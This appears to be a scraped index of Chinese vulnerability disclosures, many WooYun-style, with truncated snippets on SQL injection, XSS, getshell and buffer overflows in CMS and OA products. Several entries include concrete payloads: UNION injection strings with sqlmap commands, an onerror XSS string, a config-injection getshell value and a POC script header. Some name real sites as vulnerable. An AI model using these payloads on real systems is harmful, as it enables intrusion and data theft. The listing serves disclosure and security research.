74cms(20141027)多处二次注入

简要描述： 看完了xfkxfk大神的 http://wooyun.org/bugs/wooyun-2010-070827 http://wooyun.org/bugs/wooyun-2014-070858 对74cms尝试了下，果然有收货。 详细说明： 1. user/company/companyajax.php elseif$act=="promotionaddsave" reportdeal$uid,2,$points; $userpoints=getuserpoints$uid;...

骑士CMS某新功能4处SQL注入

简要描述： 骑士CMS官网某新功能4处SQL盲注，官网测试。 详细说明： 官网培训信息搜索和猎头工作搜索等4处SQL盲注。 0x01: 当前位置：首页 教育培训 课程列表 搜索课程 http://demo.74cms.com/train/train-curriculum-list.php?district=&category=&sdistrict=&classtype=&start=&refre=&sort=hot%3Edesc&key= 参数sort存在SQL注入,desc后面的字符串全部带入SQL：...

某OA系统通用SQL注入（SA权限）

简要描述： RT 详细说明： 海天OA存在一处sql注入 海天OA官网：http://www.haitiansoft.com:8080/ SQL注入点： \car\ShenQingInforDis.asp?OAID= 漏洞证明： 案例： http://180.166.7.94/car/ShenQingInforDis.asp?OAID=1 http://oa.tjfsu.edu.cn/car/ShenQingInforDis.asp?OAID=1 http://www.fzsyxx.com/oa/car/ShenQingInforDis.asp?OAID=1...

Discuz! x某功能越权漏洞

简要描述： rt 详细说明： 相册功能,里面的编辑图片说明可以越权修改 在 source/include/spacecp/spacecpalbum.php中 code foreach $POST'title' as $picid = $value //这里遍历数据 if$value == $GET'oldtitle'$picid continue; $title = getstr$value, 150; $title = censor$title; ifcensormod$title || $G'group''allowuploadmod' $picstatus = 1;...

骑士CMS某接口SQL注入

简要描述： 骑士CMS某接口SQL注入，官网测试。 详细说明： 翻了翻代码，看到有这么一段： user/company/companyjobs.php: elseif $act=='jobsperform' global $CFG; $yid =!empty$POST'yid'?$POST'yid':$GET'yid'; $jobsnum=count$yid; if empty$yid showmsg"ÄãûÓÐÑ¡Ôñְλ£¡",1; $refresh=!empty$POST'refresh'?$POST'refresh':$GET'refresh';...

hdwiki sql注射漏洞

简要描述： rt 详细说明： control/doc.php：docreate方法 …… 流程条件省略 …… else//点击发布词条 if$this-setting'checkcode'!=3 && $this-setting'docverificationcreatecode' && strtolower$this-post'code'!=$ENV'user'-getcode $this-message$this-view-lang'codeError','BACK',0;...

大米CMS某处SQL盲注3绕过补丁及防御

简要描述： 大米CMS某处SQL盲注3，绕过最新补丁及系统新增防御 详细说明： 原始漏洞连接： WooYun: 大米CMS某处SQL盲注2 官方在当天就出了最新版，修复了此漏洞 而且还加了全局防御，但是仍然可以绕过进行盲注 文件/Web/Lib/Action/ApiAction.class.php //万能获取数据接口 function ajaxarclist $prefix = !empty$REQUEST'prefix'?bool$REQUEST'prefix':true; //表过滤防止泄露信息,只允许的表...

大米CMS某处SQL盲注绕过防御

简要描述： 大米CMS某处SQL盲注 详细说明： 最新版大米CMS 文件/Web/Lib/Action/ArticleAction.class.php public function index if!isset$GET'aid' $this-error'非法操作'; injectcheck$GET'aid'; injectcheck$GET'p'; $aid = intval$GET'aid'; //读取数据库和缓存 obstart; //用于生成静态HTML $isbuild = C'ISBUILDHTML'; //允许参数 $allowparam =...

Chasys Draw IES 4.10.01 缓冲区溢出漏洞

No description provided by source...

Cool PDF Image Stream 3.0.2.256 缓冲区溢出漏洞

No description provided by source...

Csound 5.16.6 hetro File Handling 缓冲区溢出漏洞

No description provided by source...

Cytel Studio 9.0 (CY3 File) 缓冲区溢出漏洞

No description provided by source...

DJ Studio Pro 5.1 .pls 缓冲区溢出漏洞

No description provided by source...

DjVu DjVu_ActiveX_MSOffice.dll ActiveX Component 缓冲区溢出漏洞

No description provided by source...

GlobalSCAPE CuteZIP 2.1 缓冲区溢出漏洞

No description provided by source...

Corel PDF Fusion 1.11 缓冲区溢出漏洞

No description provided by source...

Destiny Media Player 1.61 PLS M3U 缓冲区溢出漏洞

No description provided by source...

用友FE协作办公系统SQL注入漏洞(一)

简要描述： 用友FE协作办公系统某处过滤不严，导致SQL注入漏洞 详细说明： 用友FE协作办公系统某处过滤不严，导致SQL注入漏洞，可直接union注入 注入链接：/sys/treeXml.jsp?Si06=1&type=sort 注入参数：Si06 Payload： Si06=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1--&type=sort Sqlmap命令： python sqlmap.py -u 'http://xxxx//sys/treeXml.jsp?Si06=1&type=sort' -p Si06...

Digital Music Pad Version 8.2.3.3.4 缓冲区溢出漏洞

No description provided by source...

大米CMS设计缺陷导致CSRF脱裤

简要描述： 大米CMS设计缺陷导致CSRF脱裤 详细说明： 其实大米cms全局都没有设置CSRF防御...... 文件/Admin/Lib/Action/BackupAction.class.php public function dobackup ifempty$POST'ids' $this-error'请选择需要备份的数据库表！'; $filesize = intval$POST'filesize'; if $filesize error'出错了,请为分卷大小设置一个大于512的整数值！'; $file ='./Public/Backup/'; $random =...

PHPB2B存储xss+getshell

简要描述： PHPB2B 存在多处xss。 可盲打后台且getshell。 官方最新版本. https://github.com/ulinke/phpb2b/archive/master.zip 详细说明： ex: 发布供求信息 管理后台审核供求信息: 执行post操作 dataBsettingsiteurl 存在configs/config.inc.php中。 修改siteurl为\';phpinfo;//...

大米CMS多处XSS盲打后台

简要描述： 大米CMS多处XSS盲打后台 详细说明： 大米CMS多处XSS可以盲打后台，大米CMS后台的SQL注入一大堆，只要进了后台获取数据不成问题 第一处 文件/Web/Lib/Action/GuestbookAction.class.php public function update //输出gb2312码,ajax默认转的是utf-8 header"Content-type: text/html; charset=utf-8"; if!isset$POST'author' or !isset$POST'content' alert'非法操作!',3; //读取数据库和缓存 $p...

大米CMS某处SQL盲注2

简要描述： 大米CMS某处SQL盲注第二发，可直接拖库 详细说明： 文件/Web/Lib/Action/ApiAction.class.php //万能获取数据接口 function ajaxarclist $prefix = !empty$REQUEST'prefix'?bool$REQUEST'prefix':true; //表过滤防止泄露信息,只允许的表 if!inarray$REQUEST'model',array'article','type','ad','label','link'exit; if!empty$REQUEST'model' if$prefix == true...

damicms存储xss导致getshell

简要描述： damicms存储xss导致getshell 详细说明： 1Xss Damicms使用了万恶的 getclientip 直接伪造ip，而且ip的字段是varchar50 够我xss了 然后: Ok 2xss导致getshell 由于后台 可以直接编辑文件，生成php马 那我们就用js来直接getshell Js如下: $.ajax "url": "http://192.168.153.132/dami/admin.php?s=/Tpl/Update", "type": "POST", "data":...

PHPB2B注入#3(绕过过滤)

简要描述： PHPB2B某处注入 绕过过滤。 官方最新版本. https://github.com/ulinke/phpb2b/archive/master.zip 详细说明： 1.注册企业会员。 2.注册企业会员且通过审核。 发布产品。 漏洞文件。virtual-office/product.php Content-Disposition: form-data; name="dataproductsortid" Content-Disposition: form-data; name="dataproductname" ... ... post提交:Content-Dispositio...

PHPB2B注入#2(绕过过滤)

简要描述： PHPB2B某处注入1。绕过过滤。 官方最新版本. https://github.com/ulinke/phpb2b/archive/master.zip 漏洞文件。 详细说明： POST /virtual-office/personal.php Content-Disposition: form-data; name="memberfieldfirstname" Content-Disposition: form-data; name="memberfieldlastname"...

PHPB2B注入#1(绕过过滤)

简要描述： PHPB2B某处注入1。绕过过滤。 官方最新版本. https://github.com/ulinke/phpb2b/archive/master.zip 漏洞文件。virtual-office/company.php 详细说明： POST /phpb2b/virtual-office/company.php Content-Disposition: form-data; name="datacompanyname" Content-Disposition: form-data; name="datacompanyenglishname'"...

万户OA未修补漏洞致多个政府&集团OA中招

简要描述： 该漏洞在7月份已经有人在wooyun报了，可修补效果几乎为0。 详细说明： 瘦蛟舞 提交的漏洞地址： WooYun: 万户OA任意文件上传导致代码执行（多处总结） 漏洞还是瘦蛟舞（http://www.wooyun.org/whitehats/%E7%98%A6%E8%9B%9F%E8%88%9E）提交的漏洞。 于是用google搜索：inurl:7001/defaultroot 有324条记录。 随便测其中一个上传： 被改名的文件名直接返回到页面： 然后访问：...

PHPB2B注入(绕过过滤)

简要描述： PHPB2B某处注入。绕过过滤。 详细说明： 官方最新版本. https://github.com/ulinke/phpb2b/archive/master.zip 漏洞文件。virtual-office/offer.php POST /virtual-office/offer.php Content-Disposition: form-data; name="datatradetypeid Content-Disposition: form-data; name="datatradeadwords Content-Disposition: form-data;...

phpok最新版(phpok4.2.024)一处盲注+后台getshell

简要描述： RT 详细说明： 文件/framework/www/postcontrol.php 26-38行 function indexf $id = $this-get"id"; $pid = $this-get'pid'; if!$id && !$pid errorPLang'未指定项目','','error'; $projectrs = $this-call-phpok'project',array"phpok"=$id,'pid'=$pid; if!$projectrs || !$projectrs'module' errorPLang"项目不符合要求",'','error';...

FangMail再一次存储型xss

简要描述： 存储型XSS。 我看了下乌云上似乎没人提交，故而在这里写上开始刷rank之旅。 疯狗哥，xsser，还有其他乌云审核大神，求通过，求实习帽子，普通帽子！ 详细说明： 存储型XSS，在写邮件时，请在插入网络图片处写上： x" onerror=alert111; test="111 然后在发件箱和收件箱查看皆可以触发，在历史记录预览处似乎可以触发，记得不大清了。 前一段时间做的一次审计，厂商大大求别对我说太老版本啥的可以忽略。。来乌云刷一次rank不易。。 漏洞证明：...

qibocms 地方门户系统 二次注入#5(demo测试)

简要描述： 二次注入。 详细说明： 在hy/member/homepagectrl/picfm.php中 ifcount$pidsgetone"SELECT url FROM $prepic WHERE pid='$pid'"; $db-query"UPDATE $prepicsort SET faceurl='$rturl' WHERE psid='$psid' AND uid='$uid'";//这里把出库的带入到了update查询当中 来找找入库的 break; 入库的地方挺多 随便找一处把 在hy/member/homepagectrl/picupload.php中...

骑士CMS(20141027)多个漏洞组合可致所有数据泄露+getshell

简要描述： 专注挖魂。。。 74cmsv3.5.120141027.zip 无限制SQL注入 详细说明： 刚下了个74cmsv3.5.120141027.zip，diff了一下发现了下面的改动： diff -Nurp upload.1020/plus/weixin.php upload.1027/plus/weixin.php --- upload.1020/plus/weixin.php 2014-10-18 12:14:22.000000000 +0800 +++ upload.1027/plus/weixin.php 2014-10-25 14:45:22.000000000...

Hanweb-jcms /jcms/m_5_e/module/idea/opr_import_discussion.jsp 文件上传漏洞

No description provided by source...

用友FE协作办公系统SQL注入漏洞

简要描述： RT 详细说明： 用友FE协作办公系统某处过滤不严，导致SQL注入漏洞，可直接union注入 注入链接：/system/config/deptTreeXml.jsp?type=group&SG04=1 注入参数：SG04 Payload：SG04=1'+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1-- Sqlmap注入：python sqlmap.py -u 'http://xxxx/system/config/deptTreeXml.jsp?type=group&SG04=1...

Discuz /source/plugin/hux_wx/hux_wx.inc.php 本地文件包含漏洞

No description provided by source...

pageadmin ViewState缺陷导致sql注入

简要描述： 此处省略50万条网站信息 1、.............. 2、.............. .............. 50.、http://www.pageadmin.net 影响页面甚多，还望厂商以及各站长能逐一检查 听说咱们出新功能了 乌云新增刷乌云币功能 连接http://zone.wooyun.org/content/16138 特地来试试好不好使 另外所用到的工具同样在“测试代码”中提供下载地址 详细说明： 具体分析： 1、查找一个动态页面 例如： /e/aspx/dataselect.aspx 参数：...

Discuz! Board X /batch.common.php SQL注入漏洞

No description provided by source...

Discuz /config_global.php.bak 备份文件发现漏洞

No description provided by source...

qibocms 地方门户系统 注入#3 (demo测试)

简要描述： Fighting 详细说明： 在/hy/member/homepagectrl.php 中 if$atn&&eregi"^a-z0-9+$",$atn&&isfiledirnameFILE."/homepagectrl/$atn.php" requireoncedirnameFILE."/homepagectrl/$atn.php"; 包含文件进来 hy\member\homepagectrl\picedit.php中 ifcount$pidsquery"SELECT FROM $prepic WHERE pid IN$pids ORDER BY orderlist DESC...

PHPMyWind一处注入（鸡肋）

简要描述： sql注射。 详细说明： include\common.func.php: function GetIP static $ip = NULL; if$ip !== NULL return $ip; ifisset$SERVER'HTTPXFORWARDEDFOR' $arr = explode',', $SERVER'HTTPXFORWARDEDFOR'; $pos = arraysearch'unknown',$arr; iffalse !== $pos unset$arr$pos; $ip = trim$arr0; else...

Drupal 7.x /includes/database/database.inc SQL注入漏洞

Includes/database/database.inc protected function expandArguments&$query, &$args $modified = FALSE; foreach arrayfilter$args, 'isarray' as $key = $data $newkeys = array; foreach $data as $i = $value $newkeys$key . '' . $i = $value; $query = pregreplace'' . $key . '\b', implode', ',...

大米CMS注入后台可以getshelll

简要描述： 大米CMS注入，后台可以getshelll 详细说明： 一注入 1.挖洞前奏 Damicms搭建在本地以后，对cms\dami\Core\Lib\Think\Db\Db.class.php进行修改，将sq语句vardump处理。 然后就进行黑盒测试。搜索点，以及admin登入点输入单引号就会给过滤了。。。 看到有注册功能，发现登入点居然没有过滤单引号。。。 这运气比较好了 2.漏洞原理 于是苦逼看代码，发现thinkphp 看不懂 - - 去学习了一下回来了。。。。 发现登入点在: dami\Web\Lib\Action\MemberAction.class.php 这控制器...

金蝶政务GSiS服务平台多处越权访问（可越权添加管理员）

简要描述： GSiS政务服务平台：首个完全根据国家政策要求全新开发的，支撑政务服务体系和行政权力监督体系融合运转的一体化平台。 存在越权，可直接查看管理员密码、添加管理员、删除管理员、删除申请单、修改配置等等，所以自认为属于高危了 详细说明： 程序名称：Kingdee GSIS 开发公司：金蝶 漏洞类型：越权访问 漏洞文件： /kdgs/core/superuser/superUserList.jsp 可修改管理员 /kdgs/core/superuser/list.jsp /kdgs/core/superuser/save.action 越权添加管理员...

Infosea GLIS V7.0&V9.0 Sql Injection

简要描述： 清大新洋图书管理系统V7.0和V9.0版存在注入漏洞 详细说明： 写了那么多洞儿也没来一个大厂商呢。好伤心呀！我就不像某些人一样一个系统十个注入点分开刷了来一个首页可好啊？ v9.0的是oracle数据库、v7.0的似mssql数据库 官网案例：http://www.infosea.com.cn/yonghu.html（有点吓人） GLIS V7.0默认风格： GLIS V9.0默认风格： 两处SQL注入： 第一处：/opac/ckgc.jsp?kzh= GLIS V9.0版本 第二处：/opac/fljs/fllist.jsp?flh= GLIS V7.0版本 漏洞证明：...

cmseasy的SQL注射漏洞（附分析和exp）

简要描述： cmseasy sql注射漏洞 详细说明： 先看 manageact.php 174行 if!session::get'from' session::set'from',front::$from; 如果 session中没有 from这个的话就设置front类中$from这个为值,我们追追他的$from怎么产生的。 在 frontclass.php 312-313 if isset$SERVER'HTTPREFERER' self::$from=$SERVER'HTTPREFERER'; 看了下,好像没有对...

qibocms地方门户系统注入（多处类似,demo测试)

简要描述： 初始化啊 初始化。 详细说明： 很多类似的 随便找个地方把。 首先注册个会员。 在dianping/post.php中 if$action=="postnew" if$webdbForbidPostMore if$db-getone"SELECT FROM $precontent WHERE uid='$lfjuid' LIMIT 1" showerr"系统设置每人只能发布一个商铺!"; if!checkrandnum$POST"$webdbrandnuminputname" showerr"系统随机码失效,请返回,刷新一下页面,再重新输入数据,重新提交!";...

qibocms地方门户系统注入一个问题(demo测试)

简要描述： 一周4个小时的假期也够苦的。 life5.qibosoft.com 听说一般应用。 注入 && 另外一个问题。 详细说明： ifereg"^-0-9a-zA-Z+$",$GETjobs //不读数据库 ifisfiledirnameFILE."/../inc/job/$GETjobs.php" includedirnameFILE."/../inc/job/$GETjobs.php"; elseifereg"^-0-9a-zA-Z+$",$GET'job'||ereg"^-0-9a-zA-Z+$",$POST'job' //读数据库...

ShopBuilder 5.6.1 /module/patment/admin/bank_account_mod.php SQL注入漏洞

No description provided by source. !/usr/bin/env python coding=utf-8 import re import urllib2 from comm import cmdline from comm import generic pocinfo = 'VulId': '1567', 'Name': 'ShopBuilder 5.6.1 /module/patment/admin/bankaccountmod.php SQL注入漏洞 POC', 'AppName': 'ShopBuilder', 'AppPowerLink':...

ShopBuilder 5.6.1 /module/vote/vote.php SQL注入漏洞

No description provided by source...